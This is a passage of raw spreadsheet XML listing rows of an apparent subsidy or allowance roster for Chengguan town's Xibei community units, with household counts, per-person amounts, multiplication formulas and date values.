      <c r="E805" s="24" t="s">
        <v>772</v>
      </c>
      <c r="F805" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G805" s="24">
        <v>1</v>
      </c>
      <c r="H805" s="25">
        <v>365</v>
      </c>
      <c r="I805" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J805" s="41">
        <v>45108</v>
      </c>
      <c r="K805" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="806" customHeight="1" spans="1:11">
      <c r="A806" s="23" t="s">
        <v>2176</v>
      </c>
      <c r="B806" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C806" s="24" t="s">
        <v>2177</v>
      </c>
      <c r="D806" s="24" t="s">
        <v>2178</v>
      </c>
      <c r="E806" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F806" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G806" s="24">
        <v>1</v>
      </c>
      <c r="H806" s="25">
        <v>365</v>
      </c>
      <c r="I806" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J806" s="41">
        <v>45108</v>
      </c>
      <c r="K806" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="807" customHeight="1" spans="1:11">
      <c r="A807" s="23" t="s">
        <v>2179</v>
      </c>
      <c r="B807" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C807" s="24" t="s">
        <v>2174</v>
      </c>
      <c r="D807" s="24" t="s">
        <v>2180</v>
      </c>
      <c r="E807" s="24" t="s">
        <v>2181</v>
      </c>
      <c r="F807" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G807" s="24">
        <v>1</v>
      </c>
      <c r="H807" s="25">
        <v>365</v>
      </c>
      <c r="I807" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J807" s="41">
        <v>45108</v>
      </c>
      <c r="K807" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="808" customHeight="1" spans="1:11">
      <c r="A808" s="23" t="s">
        <v>2182</v>
      </c>
      <c r="B808" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C808" s="24" t="s">
        <v>2177</v>
      </c>
      <c r="D808" s="24" t="s">
        <v>2183</v>
      </c>
      <c r="E808" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F808" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G808" s="24">
        <v>1</v>
      </c>
      <c r="H808" s="25">
        <v>365</v>
      </c>
      <c r="I808" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J808" s="41">
        <v>45108</v>
      </c>
      <c r="K808" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="809" customHeight="1" spans="1:11">
      <c r="A809" s="23" t="s">
        <v>2184</v>
      </c>
      <c r="B809" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C809" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D809" s="24" t="s">
        <v>2185</v>
      </c>
      <c r="E809" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F809" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G809" s="24">
        <v>1</v>
      </c>
      <c r="H809" s="25">
        <v>365</v>
      </c>
      <c r="I809" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J809" s="41">
        <v>45108</v>
      </c>
      <c r="K809" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="810" customHeight="1" spans="1:11">
      <c r="A810" s="23" t="s">
        <v>2186</v>
      </c>
      <c r="B810" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C810" s="24" t="s">
        <v>2187</v>
      </c>
      <c r="D810" s="24" t="s">
        <v>2188</v>
      </c>
      <c r="E810" s="24" t="s">
        <v>1184</v>
      </c>
      <c r="F810" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G810" s="24">
        <v>2</v>
      </c>
      <c r="H810" s="25">
        <v>325</v>
      </c>
      <c r="I810" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J810" s="41">
        <v>45108</v>
      </c>
      <c r="K810" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="811" customHeight="1" spans="1:11">
      <c r="A811" s="23" t="s">
        <v>2189</v>
      </c>
      <c r="B811" s="24" t="str">
        <f>B810</f>
        <v>城关镇</v>
      </c>
      <c r="C811" s="24" t="str">
        <f>C810</f>
        <v>西北社区教育局</v>
      </c>
      <c r="D811" s="23" t="s">
        <v>2190</v>
      </c>
      <c r="E811" s="23" t="s">
        <v>2191</v>
      </c>
      <c r="F811" s="24" t="str">
        <f>F810</f>
        <v>4113210106</v>
      </c>
      <c r="G811" s="24"/>
      <c r="H811" s="24"/>
      <c r="I811" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J811" s="41"/>
      <c r="K811" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="812" customHeight="1" spans="1:11">
      <c r="A812" s="23" t="s">
        <v>2192</v>
      </c>
      <c r="B812" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C812" s="24" t="s">
        <v>2177</v>
      </c>
      <c r="D812" s="24" t="s">
        <v>2193</v>
      </c>
      <c r="E812" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F812" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G812" s="24">
        <v>1</v>
      </c>
      <c r="H812" s="25">
        <v>365</v>
      </c>
      <c r="I812" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J812" s="41">
        <v>45108</v>
      </c>
      <c r="K812" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="813" customHeight="1" spans="1:11">
      <c r="A813" s="23" t="s">
        <v>2194</v>
      </c>
      <c r="B813" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C813" s="24" t="s">
        <v>2187</v>
      </c>
      <c r="D813" s="24" t="s">
        <v>2195</v>
      </c>
      <c r="E813" s="24" t="s">
        <v>2196</v>
      </c>
      <c r="F813" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G813" s="24">
        <v>1</v>
      </c>
      <c r="H813" s="25">
        <v>365</v>
      </c>
      <c r="I813" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J813" s="41">
        <v>45108</v>
      </c>
      <c r="K813" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="814" customHeight="1" spans="1:11">
      <c r="A814" s="23" t="s">
        <v>2197</v>
      </c>
      <c r="B814" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C814" s="24" t="s">
        <v>2174</v>
      </c>
      <c r="D814" s="24" t="s">
        <v>2198</v>
      </c>
      <c r="E814" s="24" t="s">
        <v>2199</v>
      </c>
      <c r="F814" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G814" s="24">
        <v>1</v>
      </c>
      <c r="H814" s="25">
        <v>365</v>
      </c>
      <c r="I814" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J814" s="41">
        <v>45108</v>
      </c>
      <c r="K814" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="815" customHeight="1" spans="1:11">
      <c r="A815" s="23" t="s">
        <v>2200</v>
      </c>
      <c r="B815" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C815" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D815" s="24" t="s">
        <v>2201</v>
      </c>
      <c r="E815" s="24" t="s">
        <v>382</v>
      </c>
      <c r="F815" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G815" s="24">
        <v>1</v>
      </c>
      <c r="H815" s="25">
        <v>365</v>
      </c>
      <c r="I815" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J815" s="41">
        <v>45108</v>
      </c>
      <c r="K815" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="816" customHeight="1" spans="1:11">
      <c r="A816" s="23" t="s">
        <v>2202</v>
      </c>
      <c r="B816" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C816" s="24" t="s">
        <v>2187</v>
      </c>
      <c r="D816" s="24" t="s">
        <v>2203</v>
      </c>
      <c r="E816" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F816" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G816" s="24">
        <v>1</v>
      </c>
      <c r="H816" s="25">
        <v>365</v>
      </c>
      <c r="I816" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J816" s="41">
        <v>45108</v>
      </c>
      <c r="K816" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="817" customHeight="1" spans="1:11">
      <c r="A817" s="23" t="s">
        <v>2204</v>
      </c>
      <c r="B817" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C817" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D817" s="24" t="s">
        <v>2206</v>
      </c>
      <c r="E817" s="24" t="s">
        <v>405</v>
      </c>
      <c r="F817" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G817" s="24">
        <v>1</v>
      </c>
      <c r="H817" s="25">
        <v>365</v>
      </c>
      <c r="I817" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J817" s="41">
        <v>45108</v>
      </c>
      <c r="K817" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="818" customHeight="1" spans="1:11">
      <c r="A818" s="23" t="s">
        <v>2207</v>
      </c>
      <c r="B818" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C818" s="24" t="s">
        <v>2177</v>
      </c>
      <c r="D818" s="24" t="s">
        <v>2208</v>
      </c>
      <c r="E818" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F818" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G818" s="24">
        <v>1</v>
      </c>
      <c r="H818" s="25">
        <v>365</v>
      </c>
      <c r="I818" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J818" s="41">
        <v>45108</v>
      </c>
      <c r="K818" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="819" customHeight="1" spans="1:11">
      <c r="A819" s="23" t="s">
        <v>2209</v>
      </c>
      <c r="B819" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C819" s="24" t="s">
        <v>2187</v>
      </c>
      <c r="D819" s="24" t="s">
        <v>2210</v>
      </c>
      <c r="E819" s="24" t="s">
        <v>1699</v>
      </c>
      <c r="F819" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G819" s="24">
        <v>1</v>
      </c>
      <c r="H819" s="25">
        <v>365</v>
      </c>
      <c r="I819" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J819" s="41">
        <v>45108</v>
      </c>
      <c r="K819" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="820" customHeight="1" spans="1:11">
      <c r="A820" s="23" t="s">
        <v>2211</v>
      </c>
      <c r="B820" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C820" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D820" s="24" t="s">
        <v>2212</v>
      </c>
      <c r="E820" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F820" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G820" s="24">
        <v>1</v>
      </c>
      <c r="H820" s="25">
        <v>365</v>
      </c>
      <c r="I820" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J820" s="41">
        <v>45108</v>
      </c>
      <c r="K820" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="821" customHeight="1" spans="1:11">
      <c r="A821" s="23" t="s">
        <v>2213</v>
      </c>
      <c r="B821" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C821" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D821" s="24" t="s">
        <v>2214</v>
      </c>
      <c r="E821" s="24" t="s">
        <v>2215</v>
      </c>
      <c r="F821" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G821" s="24">
        <v>1</v>
      </c>
      <c r="H821" s="25">
        <v>365</v>
      </c>
      <c r="I821" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J821" s="41">
        <v>45108</v>
      </c>
      <c r="K821" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="822" customHeight="1" spans="1:11">
      <c r="A822" s="23" t="s">
        <v>2216</v>
      </c>
      <c r="B822" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C822" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D822" s="24" t="s">
        <v>2217</v>
      </c>
      <c r="E822" s="24" t="s">
        <v>2218</v>
      </c>
      <c r="F822" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G822" s="24">
        <v>1</v>
      </c>
      <c r="H822" s="25">
        <v>365</v>
      </c>
      <c r="I822" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J822" s="41">
        <v>45108</v>
      </c>
      <c r="K822" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="823" customHeight="1" spans="1:11">
      <c r="A823" s="23" t="s">
        <v>2219</v>
      </c>
      <c r="B823" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C823" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D823" s="24" t="s">
        <v>2220</v>
      </c>
      <c r="E823" s="24" t="s">
        <v>2221</v>
      </c>
      <c r="F823" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G823" s="24">
        <v>1</v>
      </c>
      <c r="H823" s="25">
        <v>365</v>
      </c>
      <c r="I823" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J823" s="41">
        <v>45108</v>
      </c>
      <c r="K823" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="824" customHeight="1" spans="1:11">
      <c r="A824" s="23" t="s">
        <v>2222</v>
      </c>
      <c r="B824" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C824" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D824" s="24" t="s">
        <v>2223</v>
      </c>
      <c r="E824" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F824" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G824" s="24">
        <v>1</v>
      </c>
      <c r="H824" s="25">
        <v>365</v>
      </c>
      <c r="I824" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J824" s="41">
        <v>45108</v>
      </c>
      <c r="K824" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="825" customHeight="1" spans="1:11">
      <c r="A825" s="23" t="s">
        <v>2224</v>
      </c>
      <c r="B825" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C825" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D825" s="24" t="s">
        <v>2225</v>
      </c>
      <c r="E825" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F825" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G825" s="24">
        <v>1</v>
      </c>
      <c r="H825" s="25">
        <v>365</v>
      </c>
      <c r="I825" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J825" s="41">
        <v>45108</v>
      </c>
      <c r="K825" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="826" customHeight="1" spans="1:11">
      <c r="A826" s="23" t="s">
        <v>2226</v>
      </c>
      <c r="B826" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C826" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D826" s="24" t="s">
        <v>2227</v>
      </c>
      <c r="E826" s="24" t="s">
        <v>1328</v>
      </c>
      <c r="F826" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G826" s="24">
        <v>1</v>
      </c>
      <c r="H826" s="25">
        <v>365</v>
      </c>
      <c r="I826" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J826" s="41">
        <v>45108</v>
      </c>
      <c r="K826" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="827" customHeight="1" spans="1:11">
      <c r="A827" s="23" t="s">
        <v>2228</v>
      </c>
      <c r="B827" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C827" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D827" s="24" t="s">
        <v>2229</v>
      </c>
      <c r="E827" s="24" t="s">
        <v>2230</v>
      </c>
      <c r="F827" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G827" s="24">
        <v>1</v>
      </c>
      <c r="H827" s="25">
        <v>365</v>
      </c>
      <c r="I827" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J827" s="41">
        <v>45108</v>
      </c>
      <c r="K827" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="828" customHeight="1" spans="1:11">
      <c r="A828" s="23" t="s">
        <v>2231</v>
      </c>
      <c r="B828" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C828" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D828" s="24" t="s">
        <v>2232</v>
      </c>
      <c r="E828" s="24" t="s">
        <v>2233</v>
      </c>
      <c r="F828" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G828" s="24">
        <v>1</v>
      </c>
      <c r="H828" s="25">
        <v>365</v>
      </c>
      <c r="I828" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J828" s="41">
        <v>45108</v>
      </c>
      <c r="K828" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="829" customHeight="1" spans="1:11">
      <c r="A829" s="23" t="s">
        <v>2234</v>
      </c>
      <c r="B829" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C829" s="24" t="s">
        <v>2174</v>
      </c>
      <c r="D829" s="24" t="s">
        <v>2235</v>
      </c>
      <c r="E829" s="24" t="s">
        <v>2236</v>
      </c>
      <c r="F829" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G829" s="24">
        <v>2</v>
      </c>
      <c r="H829" s="25">
        <v>325</v>
      </c>
      <c r="I829" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J829" s="41">
        <v>45108</v>
      </c>
      <c r="K829" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="830" customHeight="1" spans="1:11">
      <c r="A830" s="23" t="s">
        <v>2237</v>
      </c>
      <c r="B830" s="24" t="str">
        <f>B829</f>
        <v>城关镇</v>
      </c>
      <c r="C830" s="24" t="str">
        <f>C829</f>
        <v>西北社区工信局</v>
      </c>
      <c r="D830" s="30" t="s">
        <v>2238</v>
      </c>
      <c r="E830" s="30" t="s">
        <v>2239</v>
      </c>
      <c r="F830" s="24" t="str">
        <f>F829</f>
        <v>4113210106</v>
      </c>
      <c r="G830" s="24"/>
      <c r="H830" s="24"/>
      <c r="I830" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J830" s="41"/>
      <c r="K830" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="831" customHeight="1" spans="1:11">
      <c r="A831" s="23" t="s">
        <v>2240</v>
      </c>
      <c r="B831" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C831" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D831" s="24" t="s">
        <v>2241</v>
      </c>
      <c r="E831" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F831" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G831" s="24">
        <v>2</v>
      </c>
      <c r="H831" s="25">
        <v>325</v>
      </c>
      <c r="I831" s="24">
        <f t="shared" si="12"/>
        <v>650</v>
      </c>
      <c r="J831" s="41">
        <v>45108</v>
      </c>
      <c r="K831" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="832" customHeight="1" spans="1:11">
      <c r="A832" s="23" t="s">
        <v>2242</v>
      </c>
      <c r="B832" s="24" t="str">
        <f>B831</f>
        <v>城关镇</v>
      </c>
      <c r="C832" s="24" t="str">
        <f>C831</f>
        <v>西北社区县社</v>
      </c>
      <c r="D832" s="31" t="s">
        <v>2243</v>
      </c>
      <c r="E832" s="31" t="s">
        <v>2244</v>
      </c>
      <c r="F832" s="24" t="str">
        <f>F831</f>
        <v>4113210106</v>
      </c>
      <c r="G832" s="24"/>
      <c r="H832" s="24"/>
      <c r="I832" s="24">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="J832" s="41"/>
      <c r="K832" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="833" customHeight="1" spans="1:11">
      <c r="A833" s="23" t="s">
        <v>2245</v>
      </c>
      <c r="B833" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C833" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D833" s="24" t="s">
        <v>2246</v>
      </c>
      <c r="E833" s="24" t="s">
        <v>2247</v>
      </c>
      <c r="F833" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G833" s="24">
        <v>1</v>
      </c>
      <c r="H833" s="25">
        <v>365</v>
      </c>
      <c r="I833" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J833" s="41">
        <v>45108</v>
      </c>
      <c r="K833" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="834" customHeight="1" spans="1:11">
      <c r="A834" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="B834" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C834" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D834" s="24" t="s">
        <v>2249</v>
      </c>
      <c r="E834" s="24" t="s">
        <v>2250</v>
      </c>
      <c r="F834" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G834" s="24">
        <v>1</v>
      </c>
      <c r="H834" s="25">
        <v>365</v>
      </c>
      <c r="I834" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J834" s="41">
        <v>45108</v>
      </c>
      <c r="K834" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="835" customHeight="1" spans="1:11">
      <c r="A835" s="23" t="s">
        <v>2251</v>
      </c>
      <c r="B835" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C835" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D835" s="24" t="s">
        <v>2252</v>
      </c>
      <c r="E835" s="24" t="s">
        <v>2253</v>
      </c>
      <c r="F835" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G835" s="24">
        <v>1</v>
      </c>
      <c r="H835" s="25">
        <v>365</v>
      </c>
      <c r="I835" s="24">
        <f t="shared" si="12"/>
        <v>365</v>
      </c>
      <c r="J835" s="41">
        <v>45108</v>
      </c>
      <c r="K835" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="836" customHeight="1" spans="1:11">
      <c r="A836" s="23" t="s">
        <v>2254</v>
      </c>
      <c r="B836" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C836" s="24" t="s">
        <v>2255</v>
      </c>
      <c r="D836" s="24" t="s">
        <v>2256</v>
      </c>
      <c r="E836" s="24" t="s">
        <v>2257</v>
      </c>
      <c r="F836" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G836" s="24">
        <v>1</v>
      </c>
      <c r="H836" s="25">
        <v>365</v>
      </c>
      <c r="I836" s="24">
        <f t="shared" ref="I836:I899" si="13">H836*G836</f>
        <v>365</v>
      </c>
      <c r="J836" s="41">
        <v>45108</v>
      </c>
      <c r="K836" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="837" customHeight="1" spans="1:11">
      <c r="A837" s="23" t="s">
        <v>2258</v>
      </c>
      <c r="B837" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C837" s="24" t="s">
        <v>2255</v>
      </c>
      <c r="D837" s="24" t="s">
        <v>2259</v>
      </c>
      <c r="E837" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F837" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G837" s="24">
        <v>1</v>
      </c>
      <c r="H837" s="25">
        <v>365</v>
      </c>
      <c r="I837" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J837" s="41">
        <v>45108</v>
      </c>
      <c r="K837" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="838" customHeight="1" spans="1:11">
      <c r="A838" s="23" t="s">
        <v>2260</v>
      </c>
      <c r="B838" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C838" s="24" t="s">
        <v>2205</v>
      </c>
      <c r="D838" s="24" t="s">
        <v>2261</v>
      </c>
      <c r="E838" s="24" t="s">
        <v>2262</v>
      </c>
      <c r="F838" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G838" s="24">
        <v>1</v>
      </c>
      <c r="H838" s="25">
        <v>365</v>
      </c>
      <c r="I838" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J838" s="41">
        <v>45108</v>
      </c>
      <c r="K838" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="839" customHeight="1" spans="1:11">
      <c r="A839" s="23" t="s">
        <v>2263</v>
      </c>
      <c r="B839" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C839" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D839" s="24" t="s">
        <v>2264</v>
      </c>
      <c r="E839" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F839" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G839" s="24">
        <v>3</v>
      </c>
      <c r="H839" s="25">
        <v>290</v>
      </c>
      <c r="I839" s="24">
        <f t="shared" si="13"/>
        <v>870</v>
      </c>
      <c r="J839" s="41">
        <v>45108</v>
      </c>
      <c r="K839" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="840" customHeight="1" spans="1:11">
      <c r="A840" s="23" t="s">
        <v>2265</v>
      </c>
      <c r="B840" s="24" t="str">
        <f>B839</f>
        <v>城关镇</v>
      </c>
      <c r="C840" s="24" t="str">
        <f>C839</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D840" s="23" t="s">
        <v>2266</v>
      </c>
      <c r="E840" s="23" t="s">
        <v>2267</v>
      </c>
      <c r="F840" s="24" t="str">
        <f>F839</f>
        <v>4113210106</v>
      </c>
      <c r="G840" s="24"/>
      <c r="H840" s="24"/>
      <c r="I840" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J840" s="41"/>
      <c r="K840" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="841" customHeight="1" spans="1:11">
      <c r="A841" s="23" t="s">
        <v>2268</v>
      </c>
      <c r="B841" s="24" t="str">
        <f>B840</f>
        <v>城关镇</v>
      </c>
      <c r="C841" s="24" t="str">
        <f>C840</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D841" s="23" t="s">
        <v>2269</v>
      </c>
      <c r="E841" s="31" t="s">
        <v>2270</v>
      </c>
      <c r="F841" s="24" t="str">
        <f>F840</f>
        <v>4113210106</v>
      </c>
      <c r="G841" s="24"/>
      <c r="H841" s="24"/>
      <c r="I841" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J841" s="41"/>
      <c r="K841" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="842" customHeight="1" spans="1:11">
      <c r="A842" s="23" t="s">
        <v>2271</v>
      </c>
      <c r="B842" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C842" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D842" s="24" t="s">
        <v>2272</v>
      </c>
      <c r="E842" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F842" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G842" s="24">
        <v>2</v>
      </c>
      <c r="H842" s="25">
        <v>325</v>
      </c>
      <c r="I842" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J842" s="41">
        <v>45108</v>
      </c>
      <c r="K842" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="843" customHeight="1" spans="1:11">
      <c r="A843" s="23" t="s">
        <v>2273</v>
      </c>
      <c r="B843" s="24" t="str">
        <f>B842</f>
        <v>城关镇</v>
      </c>
      <c r="C843" s="24" t="str">
        <f>C842</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D843" s="23" t="s">
        <v>2274</v>
      </c>
      <c r="E843" s="23" t="s">
        <v>2275</v>
      </c>
      <c r="F843" s="24" t="str">
        <f>F842</f>
        <v>4113210106</v>
      </c>
      <c r="G843" s="24"/>
      <c r="H843" s="24"/>
      <c r="I843" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J843" s="41"/>
      <c r="K843" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="844" customHeight="1" spans="1:11">
      <c r="A844" s="23" t="s">
        <v>2276</v>
      </c>
      <c r="B844" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C844" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D844" s="24" t="s">
        <v>2277</v>
      </c>
      <c r="E844" s="24" t="s">
        <v>915</v>
      </c>
      <c r="F844" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G844" s="24">
        <v>1</v>
      </c>
      <c r="H844" s="25">
        <v>365</v>
      </c>
      <c r="I844" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J844" s="41">
        <v>45108</v>
      </c>
      <c r="K844" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="845" customHeight="1" spans="1:11">
      <c r="A845" s="23" t="s">
        <v>2278</v>
      </c>
      <c r="B845" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C845" s="24" t="s">
        <v>2168</v>
      </c>
      <c r="D845" s="24" t="s">
        <v>2279</v>
      </c>
      <c r="E845" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F845" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G845" s="24">
        <v>2</v>
      </c>
